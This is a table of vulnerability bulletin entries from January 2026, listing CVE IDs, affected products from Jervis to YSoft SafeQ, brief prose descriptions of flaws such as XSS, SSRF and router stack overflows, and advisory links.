| samrocketman--jervis | Jervis is a library for Job DSL plugin scripts and shared Jenkins pipeline libraries. Prior to 2.2, AES/CBC/PKCS5Padding lacks authentication, making it vulnerable to padding oracle attacks and ciphertext manipulation. This vulnerability is fixed in 2.2. | 2026-01-13 | not yet calculated | CVE-2025-68931 | https://github.com/samrocketman/jervis/security/advisories/GHSA-gxp5-mv27-vjcj https://github.com/samrocketman/jervis/commit/c3981ff71de7b0f767dfe7b37a2372cb2a51974a |
| Schneider Electric--EcoStruxure Power Build Rapsody | CWE-415: Double Free vulnerability exists that could cause heap memory corruption when the end user imports a malicious project file (SSD file) shared by the attacker into Rapsody. | 2026-01-15 | not yet calculated | CVE-2025-13844 | https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-013-04&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-013-04.pdf |
| Schneider Electric--EcoStruxure Power Build Rapsody | CWE-416: Use After Free vulnerability that could cause remote code execution when the end user imports the malicious project file (SSD file) into Rapsody. | 2026-01-15 | not yet calculated | CVE-2025-13845 | https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-013-04&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-013-04.pdf |
| Semantic--Semantic | An issue in Semantic machines v5.4.8 allows attackers to bypass authentication via sending a crafted HTTP request to various API endpoints. | 2026-01-13 | not yet calculated | CVE-2025-66698 | http://veda.com http://semantic.com https://github.com/Perunchess/CVE-2025-66698 |
| ServiceNow--Now Assist AI Agents | A vulnerability has been identified in the ServiceNow AI Platform that could enable an unauthenticated user to impersonate another user and perform the operations that the impersonated user is entitled to perform. ServiceNow has addressed this vulnerability by deploying a relevant security update to hosted instances in October 2025. Security updates have also been provided to ServiceNow self-hosted customers, partners, and hosted customers with unique configurations. Additionally, the vulnerability is addressed in the listed Store App versions. We recommend that customers promptly apply an appropriate security update or upgrade if they have not already done so. | 2026-01-12 | not yet calculated | CVE-2025-12420 | https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB2587329 |
| siyuan-note--siyuan | SiYuan is self-hosted, open source personal knowledge management software. Prior to 3.5.4-dev2, a Stored Cross-Site Scripting (XSS) vulnerability exists in SiYuan Note. The application does not sanitize uploaded SVG files. If a user uploads and views a malicious SVG file (e.g., imported from an untrusted source), arbitrary JavaScript code is executed in the context of their authenticated session. This vulnerability is fixed in 3.5.4-dev2. | 2026-01-16 | not yet calculated | CVE-2026-23645 | https://github.com/siyuan-note/siyuan/security/advisories/GHSA-pcjq-j3mq-jv5j https://github.com/siyuan-note/siyuan/issues/16844 https://github.com/siyuan-note/siyuan/commit/11115da3d0de950593ee4ce375cf7f9018484388 |
| Slab--Quill | A lack of data validation vulnerability in the HTML export feature in Quill allows Cross-Site Scripting (XSS). This issue affects Quill: 2.0.3. | 2026-01-13 | not yet calculated | CVE-2025-15056 | https://fluidattacks.com/advisories/diomedes https://github.com/slab/quill |
| Sonatype--Nexus Repository | Server-Side Request Forgery (SSRF) vulnerability in Sonatype Nexus Repository 3 versions 3.0.0 and later allows authenticated administrators to configure proxy repositories with URLs that can access unintended network destinations, potentially including cloud metadata services and internal network resources. A workaround configuration is available starting in version 3.88.0, but the product remains vulnerable by default. | 2026-01-14 | not yet calculated | CVE-2026-0600 | https://support.sonatype.com/hc/en-us/articles/47928855816595 |
| Sonatype--Nexus Repository | A reflected cross-site scripting vulnerability exists in Nexus Repository 3 that allows unauthenticated attackers to execute arbitrary JavaScript in a victim's browser through a specially crafted request requiring user interaction. | 2026-01-14 | not yet calculated | CVE-2026-0601 | https://help.sonatype.com/en/sonatype-nexus-repository-3-88-0-release-notes.html https://support.sonatype.com/hc/en-us/articles/47934334375955 |
| Sourcecodester--Sourcecodester | Sourcecodester Covid-19 Contact Tracing System 1.0 is vulnerable to RCE (Remote Code Execution). The application accepts a PHP reverse shell uploaded as the user's image, enabling RCE. | 2026-01-12 | not yet calculated | CVE-2025-66802 | https://feedly.com/cve/CVE-2022-2746 https://github.com/mtgsjr/CVE-2025-66802 |
| SparkyFitness--SparkyFitness | SparkyFitness v0.15.8.2 is vulnerable to Cross Site Scripting (XSS) via user input and LLM output. | 2026-01-15 | not yet calculated | CVE-2025-65368 | https://github.com/CodeWithCJ/SparkyFitness https://github.com/CodeWithCJ/SparkyFitness/security/advisories/GHSA-j7x6-6678-2xqp#event-521570 |
| Stackideas.com--EasyDiscuss extension for Joomla | Lack of input filtering leads to a persistent XSS vulnerability in the forum post handling of the Easy Discuss component for Joomla. | 2026-01-16 | not yet calculated | CVE-2026-21623 | https://stackideas.com/easydiscuss |
| Stackideas.com--EasyDiscuss extension for Joomla | Lack of input filtering leads to a persistent XSS vulnerability in the user avatar text handling of the Easy Discuss component for Joomla. | 2026-01-16 | not yet calculated | CVE-2026-21624 | https://stackideas.com/easydiscuss |
| Stackideas.com--EasyDiscuss extension for Joomla | User provided uploads to the Easy Discuss component for Joomla aren't properly validated. Uploads are purely checked by file extensions, no mime type checks are happening. | 2026-01-16 | not yet calculated | CVE-2026-21625 | https://stackideas.com/easydiscuss |
| SteelSeries--SteelSeries | SteelSeries Nahimic 3 1.10.7 allows directory traversal. | 2026-01-16 | not yet calculated | CVE-2025-68921 | https://steelseries.gg https://steelseries.com/nahimic https://gist.github.com/ZeroMemoryEx/93208b7e57a5444de3654816857ddef4 |
| Steven--Uploadify | Uploadify WordPress plugin versions up to and including 1.0 contain an arbitrary file upload vulnerability in process_upload.php due to missing file type validation. An unauthenticated remote attacker can upload arbitrary files to the affected WordPress site, which may allow remote code execution by uploading executable content to a web-accessible location. | 2026-01-15 | not yet calculated | CVE-2011-10041 | https://packetstorm.news/files/id/98652 https://wpscan.com/vulnerability/6946364c-9764-468e-87d5-2dd57e531985/ https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/uploadify/uploadify-10-arbitrary-file-upload https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-uploadify-remote-file-upload-1-0/ https://www.vulncheck.com/advisories/uploadify-unauthenticated-arbitrary-file-upload |
| Svelte--Svelte | An SSR XSS exists in async hydration when attacker-controlled keys are passed to hydratable. The key is embedded inside a <script> block without HTML-safe escaping, allowing </script> to terminate the script and inject arbitrary JavaScript. This enables remote script execution in users' browsers, with potential for session theft and account compromise. This issue affects Svelte: from 5.46.0 before 5.46.3. | 2026-01-15 | not yet calculated | CVE-2025-15265 | https://fluidattacks.com/advisories/lydian https://github.com/sveltejs/svelte/security/advisories/GHSA-6738-r8g5-qwp3 |
| sveltejs--kit | SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.49.5, SvelteKit is vulnerable to a server side request forgery (SSRF) and denial of service (DoS) under certain conditions. From 2.44.0 through 2.49.4, the vulnerability results in a DoS when your app has at least one prerendered route (export const prerender = true). From 2.19.0 through 2.49.4, the vulnerability results in a DoS when your app has at least one prerendered route and you are using adapter-node without a configured ORIGIN environment variable, and you are not using a reverse proxy that implements Host header validation. This vulnerability is fixed in 2.49.5. | 2026-01-15 | not yet calculated | CVE-2025-67647 | https://github.com/sveltejs/kit/security/advisories/GHSA-j62c-4x62-9r35 https://github.com/sveltejs/kit/commit/d9ae9b00b14f5574d109f3fd548f960594346226 |
| sveltejs--kit | SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. From 2.49.0 to 2.49.4, the experimental form remote function uses a binary data format containing a representation of submitted form data. A specially-crafted payload can cause the server to allocate a large amount of memory, causing DoS via memory exhaustion. This vulnerability is fixed in 2.49.5. | 2026-01-15 | not yet calculated | CVE-2026-22803 | https://github.com/sveltejs/kit/security/advisories/GHSA-j2f3-wq62-6q46 https://github.com/sveltejs/kit/commit/8ed8155215b9a74012fecffb942ad9a793b274e5 https://github.com/sveltejs/kit/releases/tag/@sveltejs%2Fadapter-node@5.5.1 |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the mac parameter of the sub_65B5C function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-15 | not yet calculated | CVE-2025-70656 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/11/1.md |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the cloneType parameter of the sub_65B5C function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-15 | not yet calculated | CVE-2025-70744 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/10/1.md |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the timeZone parameter of the fromSetSysTime function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-16 | not yet calculated | CVE-2025-70746 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/4/1.md |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the serviceName parameter of the sub_65A28 function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-14 | not yet calculated | CVE-2025-70747 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/6/1.md |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the security_5g parameter of the sub_4CA50 function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-13 | not yet calculated | CVE-2025-70753 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/8/1.md |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the wanSpeed parameter of the sub_65B5C function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-15 | not yet calculated | CVE-2025-71019 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/9/1.md |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the security parameter of the sub_4C408 function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-16 | not yet calculated | CVE-2025-71020 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/5/1.md |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the serverName parameter of the sub_65A28 function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-14 | not yet calculated | CVE-2025-71021 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/7/1.md |
| Tenda--Tenda | Tenda AX-3 v16.03.12.10_CN was discovered to contain a stack overflow in the mac2 parameter of the fromAdvSetMacMtuWan function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-13 | not yet calculated | CVE-2025-71023 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-3/11/1.md |
| Tenda--Tenda | Tenda AX-3 v16.03.12.10_CN was discovered to contain a stack overflow in the serviceName2 parameter of the fromAdvSetMacMtuWan function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-13 | not yet calculated | CVE-2025-71024 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-3/12/1.md |
| Tenda--Tenda | Tenda AX-3 v16.03.12.10_CN was discovered to contain a stack overflow in the cloneType2 parameter of the fromAdvSetMacMtuWan function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-13 | not yet calculated | CVE-2025-71025 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-3/10/1.md |
| Tenda--Tenda | Tenda AX-3 v16.03.12.10_CN was discovered to contain a stack overflow in the wanSpeed2 parameter of the fromAdvSetMacMtuWan function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-13 | not yet calculated | CVE-2025-71026 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-3/9/1.md |
| Tenda--Tenda | Tenda AX-3 v16.03.12.10_CN was discovered to contain a stack overflow in the wanMTU2 parameter of the fromAdvSetMacMtuWan function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-13 | not yet calculated | CVE-2025-71027 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-3/8/1.md |
| The GNU C Library--glibc | Passing too large an alignment to the memalign suite of functions (memalign, posix_memalign, aligned_alloc) in the GNU C Library version 2.30 to 2.42 may result in an integer overflow, which could consequently result in heap corruption. Note that the attacker must control both the size and the alignment arguments of the memalign function to be able to exploit this. The size parameter must be close enough to PTRDIFF_MAX so as to overflow size_t along with the large alignment argument. This limits the malicious inputs for the alignment for memalign to the range [1<<62 + 1, 1<<63] and exactly 1<<63 for posix_memalign and aligned_alloc. Typically the alignment argument passed to such functions is a known constrained quantity (e.g. page size, block size, struct sizes) and is not attacker controlled, so this may not be easily exploitable in practice. An application bug could potentially result in the input alignment being too large, e.g. due to a different buffer overflow or integer overflow in the application or its dependent libraries, but that is again an uncommon usage pattern given typical sources of alignments. | 2026-01-14 | not yet calculated | CVE-2026-0861 | https://sourceware.org/bugzilla/show_bug.cgi?id=33796 https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0001 |
| The GNU C Library--glibc | Calling getnetbyaddr or getnetbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend for networks and queries for a zero-valued network in the GNU C Library version 2.0 to version 2.42 can leak stack contents to the configured DNS resolver. | 2026-01-15 | not yet calculated | CVE-2026-0915 | https://sourceware.org/bugzilla/show_bug.cgi?id=33802 |
| The Nu Html Checker--The Nu Html Checker | Nu Html Checker (validator.nu) contains a restriction bypass that allows remote attackers to make the server perform arbitrary HTTP/HTTPS requests to internal resources, including localhost services. While the validator implements hostname-based protections to block direct access to localhost and 127.0.0.1, these controls can be bypassed using DNS rebinding techniques or domains that resolve to loopback addresses. This issue affects The Nu Html Checker (vnu): latest (commit 23f090a11bab8d0d4e698f1ffc197a4fe226a9cd). | 2026-01-16 | not yet calculated | CVE-2025-15104 | https://fluidattacks.com/advisories/europe https://github.com/validator/validator |
| TheLibrarian--TheLibrarian.io | The Librarian contains an information leakage vulnerability through the `web_fetch` tool, which can be used to retrieve arbitrary external content provided by an attacker and thereby to proxy requests through The Librarian infrastructure. The vendor has fixed the vulnerability in all versions of TheLibrarian. | 2026-01-16 | not yet calculated | CVE-2026-0612 | http://mindgard.ai/blog/thelibrarian-ios-ai-security- https://thelibrarian.io/ |
| TheLibrarian--TheLibrarian.io | The Librarian contains an internal port scanning vulnerability, facilitated by the `web_fetch` tool, which can be used with SSRF-style behavior to perform GET requests to internal IP addresses and services, enabling scanning of the Hetzner cloud environment that TheLibrarian uses. The vendor has fixed the vulnerability in all affected versions. | 2026-01-16 | not yet calculated | CVE-2026-0613 | https://mindgard.ai/blog/thelibrarian-ios-ai-security-disclosure https://thelibrarian.io/ |
| TheLibrarian--TheLibrarian.io | The Librarian `supervisord` status page can be retrieved by the `web_fetch` tool, which can be used to retrieve running processes within TheLibrarian backend. The vendor has fixed the vulnerability in all affected versions. | 2026-01-16 | not yet calculated | CVE-2026-0615 | http://mindgard.ai/blog/thelibrarian-ios-ai-security- https://thelibrarian.io/ |
| TheLibrarian--TheLibrarian.io | TheLibrarian's `web_fetch` tool can be used to retrieve the Adminer interface content, which can then be used to log into the internal TheLibrarian backend system. The vendor has fixed the vulnerability in all affected versions. | 2026-01-16 | not yet calculated | CVE-2026-0616 | https://mindgard.ai/blog/thelibrarian-ios-ai-security-disclosure https://thelibrarian.io/ |
| TinyOS--TinyOS | TinyOS versions up to and including 2.1.2 contain a global buffer overflow vulnerability in the printfUART formatted output implementation used within the ZigBee / IEEE 802.15.4 networking stack. The implementation formats output into a fixed-size global buffer and concatenates strings for %s format specifiers using strcat() without verifying remaining buffer capacity. When printfUART is invoked with a caller-controlled string longer than the available space, the unbounded sprintf/strcat sequence writes past the end of debugbuf, resulting in global memory corruption. This can cause denial of service, unintended behavior, or information disclosure via corrupted adjacent global state or UART output. | 2026-01-14 | not yet calculated | CVE-2026-22211 | https://seclists.org/fulldisclosure/2026/Jan/14 https://github.com/tinyos/tinyos-main https://www.vulncheck.com/advisories/tinyos-global-buffer-overflow-in-printfuart |
| TinyOS--TinyOS | TinyOS versions up to and including 2.1.2 contain a stack-based buffer overflow vulnerability in the mcp2200gpio utility. The vulnerability is caused by unsafe use of strcpy() and strcat() functions when constructing device paths during automatic device discovery. A local attacker can exploit this by creating specially crafted filenames under /dev/usb/, leading to stack memory corruption and application crashes. | 2026-01-12 | not yet calculated | CVE-2026-22212 | https://seclists.org/fulldisclosure/2026/Jan/14 https://github.com/tinyos/tinyos-main https://www.vulncheck.com/advisories/tinyos-stack-based-buffer-overflow-in-mcp2200gpio |
| TOA Corporation--Multiple Network Cameras TRIFORA 3 series | OS Command Injection vulnerability exists in multiple Network Cameras TRIFORA 3 series provided by TOA Corporation, which may allow a logged-in user with the low ("monitoring user") or higher privilege to execute an arbitrary OS command. | 2026-01-16 | not yet calculated | CVE-2026-20759 | https://www.toa-products.com/securityinfo/pdf/tv2025-001jp.pdf https://jvn.jp/en/jp/JVN08087148/ |
| TOA Corporation--Multiple Network Cameras TRIFORA 3 series | Cross-site scripting vulnerability exists in multiple Network Cameras TRIFORA 3 series provided by TOA Corporation. If an attacking administrator configures the affected product with some malicious input, an arbitrary script may be executed on the web browser of a victim administrator who accesses the setting screen. | 2026-01-16 | not yet calculated | CVE-2026-20894 | https://www.toa-products.com/securityinfo/pdf/tv2025-001jp.pdf https://jvn.jp/en/jp/JVN08087148/ |
| TOA Corporation--Multiple Network Cameras TRIFORA 3 series | Path Traversal vulnerability exists in multiple Network Cameras TRIFORA 3 series provided by TOA Corporation. If this vulnerability is exploited, arbitrary files on the affected product may be retrieved by a logged-in user with the low ("monitoring user") or higher privilege. | 2026-01-16 | not yet calculated | CVE-2026-22876 | https://www.toa-products.com/securityinfo/pdf/tv2025-001jp.pdf https://jvn.jp/en/jp/JVN08087148/ |
| Tongyu--Tongyu | An authentication bypass vulnerability in the Tongyu AX1800 Wi-Fi 6 Router with firmware 1.0.0 allows unauthenticated network-adjacent attackers to perform arbitrary configuration changes without providing credentials, as long as a valid admin session is active. This can result in full compromise of the device (i.e., via unauthenticated access to /boaform/formSaveConfig and /boaform/admin endpoints). | 2026-01-13 | not yet calculated | CVE-2025-68707 | https://www.tongyucom.com/product/ax1800.html https://github.com/actuator/cve/tree/main/Tongyu https://github.com/actuator/cve/blob/main/Tongyu/CVE-2025-68707.txt |
| TP-Link Systems Inc.--TL-WR841N v14 | A Null Pointer Dereference vulnerability exists in the referer header check of the web portal of TP-Link TL-WR841N v14, caused by improper input validation. A remote, unauthenticated attacker can exploit this flaw and cause Denial of Service on the web portal service. This issue affects TL-WR841N v14: before 250908. | 2026-01-15 | not yet calculated | CVE-2025-9014 | https://www.tp-link.com/us/support/faq/4894/ https://www.tp-link.com/jp/support/download/tl-wr841n/#Firmware https://www.tp-link.com/en/support/download/tl-wr841n/#Firmware https://www.tp-link.com/us/support/download/tl-wr841n/#Firmware |
| TP-Link Systems Inc.--VIGI InSight Sx45 Series (S245/S345/S445) | Authentication bypass in the password recovery feature of the local web interface across multiple VIGI camera models allows an attacker on the LAN to reset the admin password without verification by manipulating client-side state. Attackers can gain full administrative access to the device, compromising configuration and network security. | 2026-01-16 | not yet calculated | CVE-2026-0629 | https://www.vigi.com/us/support/download/ https://www.vigi.com/en/support/download/ https://www.vigi.com/in/support/download/ https://www.tp-link.com/us/support/faq/4899/ |
| Typesetter--Typesetter | Typesetter CMS versions up to and including 5.1 contain a reflected cross-site scripting (XSS) vulnerability in the Editing component. The images parameter (submitted as images[] in a POST request) is reflected into an HTML href attribute without proper context-aware output encoding in include/tool/Editing.php. An authenticated attacker with editing privileges can supply a JavaScript pseudo-protocol (e.g., javascript:) to trigger arbitrary JavaScript execution in the context of the victim's browser session. | 2026-01-14 | not yet calculated | CVE-2025-71164 | https://github.com/Typesetter/Typesetter https://github.com/Typesetter/Typesetter/issues/706 https://www.vulncheck.com/advisories/typesetter-cms-reflected-xss-via-editing-php |
| Typesetter--Typesetter | Typesetter CMS versions up to and including 5.1 contain a reflected cross-site scripting (XSS) vulnerability in the administrative interface within the Tools Status functionality. The path parameter is reflected into the HTML response without proper output encoding in include/admin/Tools/Status.php. An authenticated attacker can supply crafted input containing HTML or JavaScript, resulting in arbitrary script execution in the context of an authenticated user's browser session. | 2026-01-14 | not yet calculated | CVE-2025-71165 | https://github.com/Typesetter/Typesetter https://github.com/Typesetter/Typesetter/issues/709 https://www.vulncheck.com/advisories/typesetter-cms-reflected-xss-via-status-php |
| Typesetter--Typesetter | Typesetter CMS versions up to and including 5.1 contain a reflected cross-site scripting (XSS) vulnerability in the administrative interface within the Tools Status move message handling. The path parameter is reflected into the HTML output without proper output encoding in include/admin/Tools/Status.php. An authenticated attacker can supply crafted input containing HTML or JavaScript, resulting in arbitrary script execution in the context of an authenticated user's browser session. | 2026-01-14 | not yet calculated | CVE-2025-71166 | https://github.com/Typesetter/Typesetter https://github.com/Typesetter/Typesetter/issues/707 https://www.vulncheck.com/advisories/typesetter-cms-reflected-xss-via-move-message-handling |
| TYPO3--TYPO3 CMS | By exploiting the defVals parameter, attackers could bypass field‑level access checks during record creation in the TYPO3 backend. This gave them the ability to insert arbitrary data into prohibited exclude fields of a database table for which the user already has write permission for a reduced set of fields. This issue affects TYPO3 CMS versions 10.0.0-10.4.54, 11.0.0-11.5.48, 12.0.0-12.4.40, 13.0.0-13.4.22 and 14.0.0-14.0.1. | 2026-01-13 | not yet calculated | CVE-2025-59020 | https://typo3.org/security/advisory/typo3-core-sa-2026-001 Git commit of main branch Git commit of 13.4 branch Git commit of 12.4 branch |
| TYPO3--TYPO3 CMS | Backend users with access to the redirects module and write permission on the sys_redirect table were able to read, create, and modify any redirect record without restriction to the user's own file-mounts or web-mounts. This allowed attackers to insert or alter redirects pointing to arbitrary URLs - facilitating phishing or other malicious redirect attacks. This issue affects TYPO3 CMS versions 10.0.0-10.4.54, 11.0.0-11.5.48, 12.0.0-12.4.40, 13.0.0-13.4.22 and 14.0.0-14.0.1. | 2026-01-13 | not yet calculated | CVE-2025-59021 | https://typo3.org/security/advisory/typo3-core-sa-2026-002 Git commit of main branch Git commit of 13.4 branch Git commit of 12.4 branch |
| TYPO3--TYPO3 CMS | Backend users who had access to the recycler module could delete arbitrary data from any database table defined in the TCA - regardless of whether they had permission to that particular table. This allowed attackers to purge and destroy critical site data, effectively rendering the website unavailable. This issue affects TYPO3 CMS versions 10.0.0-10.4.54, 11.0.0-11.5.48, 12.0.0-12.4.40, 13.0.0-13.4.22 and 14.0.0-14.0.1. | 2026-01-13 | not yet calculated | CVE-2025-59022 | https://typo3.org/security/advisory/typo3-core-sa-2026-003 Git commit of main branch Git commit of 13.4 branch Git commit of 12.4 branch |
| TYPO3--TYPO3 CMS | TYPO3's mail‑file spool deserialization flaw lets local users with write access to the spool directory craft a malicious file that is deserialized during the mailer:spool:send command, enabling arbitrary PHP code execution on the web server. This issue affects TYPO3 CMS versions 10.0.0-10.4.54, 11.0.0-11.5.48, 12.0.0-12.4.40, 13.0.0-13.4.22 and 14.0.0-14.0.1. | 2026-01-13 | not yet calculated | CVE-2026-0859 | https://typo3.org/security/advisory/typo3-core-sa-2026-004 Git commit of main branch Git commit of 13.4 branch Git commit of 12.4 branch |
| Vanilla OS--fabricators ltd | fabricators Ltd Vanilla OS 2 Core image v1.1.0 was discovered to contain static keys for the SSH service, allowing attackers to possibly execute a man-in-the-middle attack during connections with other hosts. | 2026-01-13 | not yet calculated | CVE-2024-54855 | http://vanilla.com http://fabricators.com https://github.com/Vanilla-OS/core-image/security/advisories/GHSA-67pc-hqr2-g34h |
| Viafirma--Inbox | IDOR vulnerability has been found in Viafirma Inbox v4.5.13 that allows any authenticated user without privileges in the application to list all users, access and modify their data. This allows the user's email addresses to be modified and, subsequently, using the password recovery functionality to access the application by impersonating any user, including those with administrative permissions. | 2026-01-12 | not yet calculated | CVE-2025-41077 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-viafirma-products |
| Viafirma--Viafirma Documents | Weaknesses in the authorization mechanisms of Viafirma Documents v3.7.129 allow an authenticated user without privileges to list and access other user data, use user creation, modification, and deletion features, and escalate privileges by impersonating other users of the application in the generation and signing of documents. | 2026-01-12 | not yet calculated | CVE-2025-41078 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-viafirma-products |
| Vivotek--FD8365, FD8365v2, FD9165, FD9171, FD9187, FD9189, FD9365, FD9371, FD9381, FD9387, FD9389, FD9391, FE9180, FE9181, FE9191, FE9381, FE9382, FE9391, FE9582, IB9365, IB93587LPR, IB9371, IB9381, IB9387, IB9389, IB939, IP9165, IP9171, IP9172, IP9181, IP9191, IT9389, MA9321, MA9322, MS9321, MS9390, TB9330 | Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in the firmware modules of the listed Vivotek device models allows OS Command Injection. This issue affects the listed models with firmware versions 0100a, 0106a, 0106b, 0107a, 0107b_1, 0109a, 0112a, 0113a, 0113d, 0117b, 0119e, 0120b, 0121, 0121d, 0121d_48573_1, 0122e, 0124d_48573_1, 012501, 012502 and 0125c. | 2026-01-13 | not yet calculated | CVE-2026-22755 | http://www.vapidlabs.com/advisory.php?v=220 |
| WeblateOrg--weblate | Weblate is a web based localization tool. Prior to 5.15.2, the screenshot images were served directly by the HTTP server without proper access control. This could allow an unauthenticated user to access screenshots after guessing their filename. This vulnerability is fixed in 5.15.2. | 2026-01-14 | not yet calculated | CVE-2026-21889 | https://github.com/WeblateOrg/weblate/security/advisories/GHSA-3g2f-4rjg-9385 https://github.com/WeblateOrg/weblate/pull/17516 https://github.com/WeblateOrg/weblate/commit/a6eb5fd0299780eca286be8ff187dc2d10feec47 |
| WordPress--Dreamer Blog | The Dreamer Blog WordPress theme through 1.2 is vulnerable to arbitrary installations due to a missing capability check. | 2026-01-13 | not yet calculated | CVE-2025-10915 | https://wpscan.com/vulnerability/dab3a804-9027-4b4a-b61c-61b562045bc4/ |
| WordPress--E-xact \| Hosted Payment \| | The E-xact \| Hosted Payment \| WordPress plugin through 2.0 is vulnerable to arbitrary file deletion due to insufficient file path validation. This makes it possible for unauthenticated attackers to delete arbitrary files on the server. | 2026-01-13 | not yet calculated | CVE-2025-14829 | https://wpscan.com/vulnerability/872569bc-16fb-427f-accc-147f284137cd/ |
| WordPress--Quiz Maker | The Quiz Maker WordPress plugin before 6.7.0.89 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2026-01-12 | not yet calculated | CVE-2025-14579 | https://wpscan.com/vulnerability/1ff8ea2b-6513-4d5c-b7ea-9ab39c9ea9c6/ |
| WorkDo--eCommerceGo SaaS | Stored Cross-Site Scripting (XSS) vulnerability in WorkDo's eCommerceGo SaaS, consisting of a lack of proper validation of user input by sending a POST request to '/store-ticket', using the 'subject' and 'description' parameters. | 2026-01-12 | not yet calculated | CVE-2025-40977 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-workdo-products |
| WorkDo--eCommerceGo SaaS | Stored Cross-Site Scripting (XSS) vulnerability in WorkDo's eCommerceGo SaaS, consisting of a stored XSS due to a lack of proper validation of user input by sending a POST request to '/ticket/x/conversion', using the 'reply_description' parameter. | 2026-01-12 | not yet calculated | CVE-2025-40978 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-workdo-products |
| WorkDo--HRMGo | Stored Cross-Site Scripting (XSS) vulnerability in WorkDo's HRMGo, consisting of a lack of proper validation of user input by sending a POST request to '/hrmgo/ticket/changereply', using the 'description' parameter. | 2026-01-12 | not yet calculated | CVE-2025-40975 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-workdo-products |
| WorkDo--TicketGo | Stored Cross-Site Scripting (XSS) vulnerability in WorkDo's TicketGo, consisting of a lack of proper validation of user input by sending a POST request to '/ticketgo-saas/home', using the 'description' parameter. | 2026-01-12 | not yet calculated | CVE-2025-40976 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-workdo-products |
| xmall--xmall | Incorrect access control in the /member/orderList API of xmall v1.1 allows attackers to arbitrarily access other users' order details via manipulation of the query parameter userId. | 2026-01-12 | not yet calculated | CVE-2023-36331 | https://github.com/Exrick/xmall/issues/100 |
| yhirose--cpp-httplib | cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to version 0.30.1, a Denial of Service (DoS) vulnerability exists in cpp-httplib due to the unsafe handling of compressed HTTP request bodies (Content-Encoding: gzip, br, etc.). The library validates the payload_max_length against the compressed data size received from the network, but does not limit the size of the decompressed data stored in memory. | 2026-01-12 | not yet calculated | CVE-2026-22776 | https://github.com/yhirose/cpp-httplib/security/advisories/GHSA-h934-98h4-j43q https://github.com/yhirose/cpp-httplib/commit/2e2e47bab1ae6a853476eecbc4bf279dd1fef792 |
| YSoft--SafeQ 6 | Y Soft SafeQ 6 renders the Workflow Connector password field in a way that allows an administrator with UI access to reveal the value using browser developer/inspection tools. The affected customers are only those with a password-protected scan workflow connector. This issue affects Y Soft SafeQ 6 in versions before MU106. | 2026-01-14 | not yet calculated | CVE-2025-13175 | https://www.ysoft.com/safeq https://docs.ysoft.cloud/safeq6/latest/safeq6/release-notes-build-106 https://cert.pl/en/posts/2026/01/CVE-2025-13175 |
